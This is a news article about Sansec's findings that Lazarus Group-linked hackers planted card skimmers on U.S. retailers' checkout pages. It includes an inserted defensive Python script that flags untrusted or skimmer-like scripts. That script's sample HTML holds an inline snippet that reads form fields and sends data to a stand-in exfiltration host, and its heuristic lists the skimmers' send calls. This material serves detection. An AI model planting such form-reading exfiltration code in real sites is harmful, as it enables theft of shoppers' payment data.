North Korean Hackers Are Now Stealing U.S. Shoppers' Credit Card Details

Hackers with suspected ties to the North Korean regime are intercepting and stealing U.S. shoppers' credit card details during online payments.

Cybercriminals with links to a state-sponsored unit known as "Hidden Cobra" have been breaking into the websites of "large U.S. retailers" and planting "skimmers" since at least May 2019, according to research released today by security firm Sansec.

Skimming is the interception of payment details during online purchases and is often referred to as a "magecart" attack. The process involves injecting malicious code into the store's checkout page—directly or via third-party providers—then lurking for victims.

In this instance, Hidden Cobra's hackers were targeting card numbers being processed as customers were making online orders, exfiltrating data to hijacked servers and likely selling the information for illicit profit on dark web markets, Sansec said.
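A defender-side check for the two injection routes described above (code planted directly in the checkout page, or delivered through a third-party script) and the off-site exfiltration that follows. This is an added example, not code from Sansec or any retailer; the trusted-host allowlist, the sample checkout HTML and the `.invalid` domains are constructed for the illustration.

```python
"""Audit the <script> tags on a checkout page against an allowlist of trusted hosts.
Skimmers arrive inline or via a compromised third-party script, so every script the
checkout page loads is compared with the hosts the store actually intends to use."""
from html.parser import HTMLParser
from urllib.parse import urlparse

TRUSTED_HOSTS = {"shop.example", "cdn.example-payments.com"}  # hypothetical store (constructed)
# Constructed checkout HTML: two expected scripts, one unknown host, one suspicious inline block.
SAMPLE_CHECKOUT = """
<script src="https://shop.example/js/checkout.js"></script>
<script src="https://cdn.example-payments.com/widget.js"></script>
<script src="https://stats.not-trusted.invalid/t.js"></script>
<script>document.forms[0].addEventListener('submit', function () {
  fetch('https://exfil.invalid/c', {method: 'POST', body: 'x'}); });</script>
"""

class ScriptCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.external, self.inline, self._buf, self._in_inline = [], [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_inline = True

    def handle_data(self, data):
        if self._in_inline:  # script bodies may arrive in chunks; buffer until </script>
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            if "".join(self._buf).strip():
                self.inline.append("".join(self._buf))
            self._in_inline, self._buf = False, []

def audit_checkout(html, trusted=TRUSTED_HOSTS):
    """Return findings a defender should review; an empty list means nothing unexpected."""
    p = ScriptCollector()
    p.feed(html)
    findings = []
    for src in p.external:
        host = urlparse(src).hostname  # relative src (hostname None) is same-origin
        if host and host not in trusted:
            findings.append(f"untrusted external script host: {host}")
    for body in p.inline:
        # Heuristic: inline code that reads form fields and sends data off-page behaves like a skimmer.
        reads = "document.forms" in body or "querySelector" in body
        sends = "fetch(" in body or "XMLHttpRequest" in body or "new Image(" in body
        if reads and sends:
            findings.append("inline script reads form fields and sends data off-page")
    return findings
```

Run it against a fresh fetch of the live checkout page on a schedule and alert on any new finding; a skimmer planted through a third-party provider shows up as a host that was never on the allowlist.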

Some legitimate websites being exploited to "harvest" payment data included an Italian modeling agency and a family-run book store located in the state of New Jersey.

The researchers identified multiple targets of the campaign, including the fashion chain Claire's, as well as businesses called Paper Source and Focus Camera.

"This... fraud has been growing since 2015 and was traditionally dominated by Russian and Indonesian-speaking hacker groups. This is no longer the case, as the criminals now face competition from their North Korean counterparts," Sansec said.

Hidden Cobra, which is also known as the Lazarus Group, has been active since at least 2009, industry analysis suggests. One fork of the state-backed hacking unit, often called Bluenoroff, is believed to be solely dedicated to financial crime.

In its report released today, Sansec said its team attributed activity to Hidden Cobra because the hackers reused infrastructure from previous hacking operations. Research found "distinctive patterns in the malware code" as further evidence, it noted.

A full list of victimized organizations has not been made public.

Hackers aligned to the group—commonly referred to as an advanced persistent threat (APT)—have been tied to a series of criminal heists in recent years, including the 2014 Sony Pictures hack and the "WannaCry" ransomware outbreak in 2017.

North Korea appeared linked to the infiltration of the Bangladesh central bank in 2016 in which hackers stole $81 million by tampering with the SWIFT network. In recent years, Hidden Cobra has had cryptocurrencies and bitcoin in its crosshairs, experts say.

While the group's exact size and funding are unknown, it is believed to work in the interest of the North Korean leadership and is "motivated primarily by financial gain as a method of circumventing long-standing sanctions against the regime," according to analysis from Malwarebytes, the California-based cybersecurity and anti-virus company.

The elite hacking unit is believed to have a range of tools at its disposal to remotely access computers, including malicious software and keyloggers.

"The scale of Lazarus operations is shocking," the Russian cybersecurity firm Kaspersky proclaimed in a detailed overview of the hacking group and its capabilities. "Those rare cases when it is caught with the same tools are operational mistakes, because the group seems to be so large one part doesn't know what the other is doing."

"We believe that it will remain one of the biggest threats to the banking sector, finance and trading companies as well as casinos, for years to come," the profile added.

[Photo caption] North Korea's leader Kim Jong-un walks to a meeting with US President Donald Trump in the Demilitarized Zone (DMZ) on June 30, 2019, in Panmunjom, Korea. BRENDAN SMIALOWSKI/AFP/Getty